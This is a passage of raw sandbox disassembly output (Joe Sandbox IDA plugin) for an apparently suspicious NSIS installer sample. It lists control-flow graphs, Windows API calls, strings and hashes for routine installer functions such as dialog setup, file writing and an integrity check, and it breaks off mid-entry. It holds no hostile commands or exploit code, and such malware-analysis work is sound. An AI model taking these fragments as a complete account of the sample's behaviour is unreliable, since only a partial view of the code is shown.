371 405591-405596 366->371 372 405585-40558b 366->372 370 4055ae-4055b3 call 403d44 367->370 370->359 374 4055cc-4055df SendMessageW 371->374 376 405598-40559e 371->376 372->374 375 40558d-40558f 372->375 374->359 375->370 379 4055a0-4055a6 call 40141d 376->379 380 4055b5-4055be call 40141d 376->380 391 4055ac 379->391 380->359 389 4055c0-4055ca 380->389 389->391 391->370 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->350 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 417 405845 415->417 416->350 418 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->418 417->341 418->341 423 4058f0-405903 ShowWindow call 403ddb 418->423 425 405908 423->425 425->350
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                              • ShowWindow.USER32(?), ref: 004054FE
                                                                                              • DestroyWindow.USER32 ref: 00405512
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                              • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                              • EnableWindow.USER32(?,?), ref: 00405783
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                              • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                              • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                              • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3282139019-0
                                                                                              • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                              • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                              • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                              • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 438 4059df-405a08 call 403ec1 call 4067aa 429->438 434 4059d4-4059da lstrcatW 430->434 435 4059be-4059cf call 405eff 430->435 434->438 435->434 444 405a9c-405aa4 call 4067aa 438->444 445 405a0e-405a13 438->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 446 405a19-405a41 call 405eff 445->446 446->444 455 405a43-405a47 446->455 453 405ad2-405af7 LoadImageW 451->453 454 405abb-405ac1 451->454 452->451 458 405b92-405b9a call 40141d 453->458 459 405afd-405b3f RegisterClassW 453->459 454->453 457 405ac3-405ac8 call 403ea0 454->457 460 405a49-405a58 call 405d32 455->460 461 405a5b-405a67 lstrlenW 455->461 457->453 478 405ba4-405baf call 403ec1 458->478 479 405b9c-405b9f 458->479 465 405c61 459->465 466 405b45-405b8d SystemParametersInfoW CreateWindowExW 459->466 460->461 462 405a69-405a77 lstrcmpiW 461->462 463 405a8f-405a97 call 40674e call 406035 461->463 462->463 471 405a79-405a83 GetFileAttributesW 462->471 463->444 470 405c63-405c6a 465->470 466->458 475 405a85-405a87 471->475 476 405a89-405a8a call 40677d 471->476 475->463 475->476 476->463 484 405bb5-405bd2 ShowWindow LoadLibraryW 478->484 485 405c38-405c39 call 405073 478->485 479->470 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 496 405c2d-405c36 call 403c94 489->496 490->489 493 405c42-405c48 491->493 494 405c5a-405c5c call 40141d 491->494 493->479 497 405c4e-405c55 call 40141d 493->497 494->465 496->470 497->479
                                                                                              APIs
                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                              • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                              • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                              • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                              • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                              • API String ID: 608394941-2746725676
                                                                                              • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                              • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                              • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                              • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • lstrcatW.KERNEL32(00000000,00000000,175,004D70B0,00000000,00000000), ref: 00401A76
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,175,175,00000000,00000000,175,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427179,774D23A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427179,774D23A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427179,774D23A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                              • String ID: 175$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                              • API String ID: 4286501637-3668370020
                                                                                              • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                              • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                              • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                              • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 601 4033d8-4033d9 597->601 599 403546-403548 598->599 600 4033eb-403432 GetTickCount 598->600 604 40354a-40354d 599->604 605 4035ac-4035af 599->605 602 403564 600->602 603 403438-403440 600->603 606 403567-40356b 601->606 602->606 607 403442 603->607 608 403445-403453 call 403336 603->608 609 403552-40355b call 403336 604->609 610 40354f 604->610 611 4035b1 605->611 612 40356e-403574 605->612 607->608 608->597 621 403455-40345e 608->621 609->597 620 403561 609->620 610->609 611->602 615 403576 612->615 616 403579-403587 call 403336 612->616 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->602 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->601 629->605 630->601 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->603 640 403536 634->640 638 403513-40351e 635->638 639 4034f3-403507 WriteFile 635->639 636->632 636->637 644 4034e5 637->644 643 403521-403525 638->643 639->627 642 403509-40350c 639->642 640->602 642->627 645 40350e-403511 642->645 643->623 646 40352b 643->646 644->632 645->643 646->602
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004033F1
                                                                                              • GetTickCount.KERNEL32 ref: 00403492
                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                              • wsprintfW.USER32 ref: 004034CE
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00427179,00403792,00000000), ref: 004034FF
                                                                                              • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileTickWrite$wsprintf
                                                                                              • String ID: (]C$... %d%%$pAB$y1B$yqB
                                                                                              • API String ID: 651206458-2833410987
                                                                                              • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                              • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                              • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                              • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 695 40375f-403765 669->695 670->666 694 403797-4037a8 670->694 673 403670-403677 671->673 674 4037e9-4037f0 call 4032d2 671->674 678 4036f3-4036f7 673->678 679 403679-40368d call 405e38 673->679 674->666 682 403701-403707 678->682 683 4036f9-403700 call 4032d2 678->683 679->682 698 40368f-403696 679->698 689 403716-403720 682->689 690 403709-403713 call 4072ad 682->690 683->682 689->662 693 403726 689->693 690->689 693->660 699 4037b0-4037b3 694->699 700 4037aa 694->700 695->666 695->670 698->682 702 403698-40369f 698->702 704 4037b6-4037be 699->704 700->699 702->682 703 4036a1-4036a8 702->703 703->682 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->682 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->682 713 4036ef-4036f1 711->713 712->693 712->711 713->682
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004035C4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 00403603
                                                                                              • soft, xrefs: 004036A1
                                                                                              • Null, xrefs: 004036AA
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                              • Inst, xrefs: 00403698
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                              • API String ID: 4283519449-527102705
                                                                                              • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                              • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                              • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                              • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00445D80,00427179,774D23A0,00000000), ref: 00404FD6
                                                                                              • lstrlenW.KERNEL32(004034E5,00445D80,00427179,774D23A0,00000000), ref: 00404FE6
                                                                                              • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427179,774D23A0,00000000), ref: 00404FF9
                                                                                              • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427179,774D23A0,00000000), ref: 00406902
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2740478559-0
                                                                                              • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                              • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                              • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                              • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                              APIs
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWritelstrcpyn
                                                                                              • String ID: 175$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                              • API String ID: 247603264-3167311633
                                                                                              • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                              • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                              • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                              • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 750 405073-405091 OleInitialize call 403ddb 752 405096-405098 750->752 753 4050c7-4050de call 403ddb OleUninitialize 752->753 754 40509a 752->754 756 40509d-4050a3 754->756 758 4050e1-4050ec call 4062cf 756->758 759 4050a5-4050bf call 4062cf call 40139d 756->759 765 4050ed-4050f5 758->765 759->765 768 4050c1 759->768 765->756 767 4050f7 765->767 767->753 768->753
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
